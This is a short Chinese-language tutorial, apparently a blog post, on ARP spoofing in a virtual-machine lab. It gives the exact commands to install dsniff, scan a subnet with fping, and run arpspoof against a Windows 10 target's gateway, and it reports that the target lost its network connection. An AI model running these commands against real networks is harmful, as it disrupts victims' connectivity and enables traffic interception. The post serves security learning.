学习ARP欺骗

攻击机kali: 192.168.244.131

靶机win10: 192.168.244.128 

靶机网关:   192.168.244.2

注:一切都在虚拟机里进行的实验

 现在可以发现我们靶机的网络是正常的

我们开始实验:

因为ARP欺骗需要用到dsniff数据包(arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff),安装命令如下:

安装dsniff

apt-get install dsniff -y

注意:如果下载失败,可能是kali源的问题,可以编辑一下软件源配置文件

vim /etc/apt/sources.list  //进入软件源配置文件编辑模式 

 

将原来的源注释掉,然后换成别的源,我这里用的是中科大的源

deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

安装一下签名

wget archive.kali.org/archive-key.asc

apt-key add archive-key.asc

更新源

apt-get update //更新源

再安装dsniff

安装好后,我们现在开始收集信息

ifconfig  //确定网卡名称和地址

 发现网卡名称是eth0 kali的IP地址为192.168.244.131

嗅探ip设备

fping -g 本机地址/24  //嗅探你所在WLAN下所有设备的IP地址

发现靶机的IP地址192.168.244.128

发起攻击

arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址

我发起的对win10靶机的攻击

arpspoof -i eth0 -t 192.168.244.128 192.168.244.2 

出现下面这种情况证明攻击正在进行

我们再看看win10的情况

 可以看见,攻击已经成功,win10已经无法连接到网络

注:按ctrl z可以中断攻击

评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值